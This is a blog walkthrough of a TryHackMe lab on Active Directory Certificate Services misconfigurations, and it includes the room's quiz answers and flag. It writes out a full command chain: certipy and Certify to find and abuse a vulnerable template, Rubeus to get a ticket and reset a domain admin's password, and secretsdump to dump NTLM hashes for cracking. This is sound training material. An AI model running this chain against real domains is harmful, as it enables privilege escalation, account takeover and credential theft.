TryHackMe AD Certificate Templates Walkthrough

Rich
5 min readNov 9, 2024

--

TL;DR Walkthrough of the TryHackMe room AD Certificate Templates and a brief overview of what they missed.

THM Walkthroughs:

A full list of our TryHackMe walkthroughs and cheatsheets is here.

Background

This room provides a brief overview of AD CS and the potential for misconfigurations that can lead to abuse. It is very brief, but recommends reading SpectreOps whitepaper titled Certified Pre-owned, which is excellent advice. The room’s title is odd as it leaves out the ‘CS’ in ‘AD CS templates’. IMHO this matters as Certificate Services (CS) is not enabled in Active Directory (AD) by default.

The room was also a bit odd as it stressed using the GUI to abuse a template. Here at test.local we don’t like to do anything in the GUI if it can be avoided, Group Policy being one of those few GUI use cases. CLIs are important because if you can accomplish something in the CLI then you are halfway or more towards automating it.

Like many TryHackMe rooms, this one is artificially constrained by the requirement to put everything on one VM. Therefore we are attacking AD CS while logged on interactively to the CA, which is also the DC. This makes the attack play out slightly differently as seen in Task 5.

The room I created on TryHackMe was likewise constrained. I had wanted to bring Mishky’s AD Range to TryHackMe.

— — Task 1 — -

Read the above

No answer needed

— — Task 2 — -

Read the above

No answer needed

What does the user create to ask the CA for a certificate?

Certificate Signing Request

What is the name of Microsoft’s PKI implementation?

Active Directory Certificate Services

— — Task 3 — -

What AD group will allow all AD user accounts to request a certificate?

Domain Users

What AD group will allow all domain-joined computers to request a certificate?

Domain Computers

Which EKU allows us to use the generated certificate for Kerberos authentication?

Client Authentication

Which certificate template is misconfigured based on the three provided parameters?

certipy-ad find -u 'thm@lunar.eruca.com' -p Password1\@ -dc-ip 10.10.165.85 -vulnerable -enabled -old-bloodhound

lunar-LUNDC-CA = CA Name

UserRequest = Template Name

User Request = Display Name

‘User Request’ is the answer TryHackMe wants, however the HTTPSWebServer template is also vulnerable.

CA details shown in certipy-ad
Template details show in certipy-ad

Cerfity.exe can be used on Windows to find these vulnerable templates.

.\Certify.exe find /vulnerable

— — Task 4 — -

In which field do we inject the User Principal Name of the account we want to impersonate?

Subject Alternative Name

If we had administrative access, when adding the snap-in, which option would we select to use the machine account of the host instead of our authenticated AD account for certificate generation?

Computer account

Follow the steps above and generate your very own privilege escalation certificate

No answer needed

— — Task 5 — -

What is the value of the flag stored on the Administrator’s Desktop?

xfreerdp /v:10.10.2.232 /u:thm /p:Password1\@ /dynamic-resolution

Defender isn’t enabled on this VM, so one can simply copy/paste Certify, openssl, and Rubeus to thm’s Desktop. Certify is used for the request, the output is saved to cert.pem on the Desktop, then exported to cert.pfx using openssl, and finally used to request a ticket with Rubeus.

Normally one would pass the ticket and use it with PsTools to get a network logon to another domain system as the user we are impersonating, but in this case there is only the one VM. Therefore TryHackMe wants us to use the ticket to reset another administrators password.

.\CertifyII.exe request /ca:LUNDC.lunar.eruca.com\lunar-LUNDC-CA /template:HTTPSWebServer /altname:Administrator

.\openssl\openssl\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Password12!@ [Enter twice to confirm]

.\Rubeus.exe asktgt /user:Administrator /certificate:C:\Users\thm\Desktop\cert.pfx /password:Password12!@ /outfile:cert.kirbi /domain:lunar.eruca.com /dc:10.10.2.232
.\Rubeus.exe changepw /ticket:C:\Users\thm\Desktop\cert.kirbi /new:Password12!@ /dc:LUNDC.lunar.eruca.com /targetuser:lunar.eruca.com\da-clloyd

Run PowerShell_ISE or PowerShell as da-clloyd using the password we just set.

icacls C:\Users\Administrator /grant lunar\da-clloyd:F
Get-Content C:\Users\Administrator\Desktop\flag.txt

THM{AD.Certs.Can.Get.You.DA}

While we have admin let’s dump everyone’s NTLM so we can feed it into crackstation.net later. Attackers would do this to check for password re-use as Dave in Accounting might just be using the same password for the company’s bank account.

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc da-clloyd:Password12\!\@@10.10.2.232 > ADCS.txt

One can easily copy/paste that file over to Windows and parse out just the NTLM hashes via:

$Hashes = Get-Content ".\ADCS.txt"
ForEach($Hash in $Hashes)
{$Hash.split(':')[3] | Out-File ".\AD CS\Hashes.txt" -Append
}

Crackstation.net only accepts 20 hashes at a time, so

Get-Content ".\Hashes.txt" | Select-Object -First 20

We get 2 hits immediately. I tried another random batch of 20 and got 1 hit.

— — Task 6 — -

Read the above

No answer needed

— — Task 7 — -

Read the above

No answer needed

Summary

Overall this room was a good introduction to AD CS. It did leave out a few key things IMHO, namely the location in AD where the template objects are stored, what their attributes look like and what they mean, and what to watch out for regarding their DACLs.

Like the author of this TryHackMe room, I highly recommend reading SpectreOps whitepaper on AD CS, or at least read their article summarizing it here. If you want to try a slightly more nuanced AD CS abuse, along with everything from DACL abuse to credential dumping then try out Mishky’s AD Range, located on GitHub here.

There’s nothing inherently wrong with AD CS, it’s secure by default, and it’s required for smartcards which are definitely good for security. It’s important however to watch out for misconfigurations. Much like a misconfiguration in AD, one in AD CS can allow an attacker to seize control.

References

Certified Pre-Owner: https://posts.specterops.io/certified-pre-owned-d95910965cd2

PowerShell PKI Module: https://www.pkisolutions.com/tools/pspki

Install NuGet: https://stackoverflow.com/questions/16657778/install-nuget-via-powershell-script

Add-CATemplate, publish a template: https://learn.microsoft.com/en-us/powershell/module/adcsadministration/add-catemplate?view=windowsserver2022-ps

How to enumerate AD CS: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/

Abusing ‘Dangerous Rights’ on AD CS templates: https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates

Certified Pre-Owned summary: https://posts.specterops.io/certified-pre-owned-d95910965cd2

Certified Pre-Owned white paper: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

--

--

Rich
Rich

Written by Rich

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from auditing or the lab.

No responses yet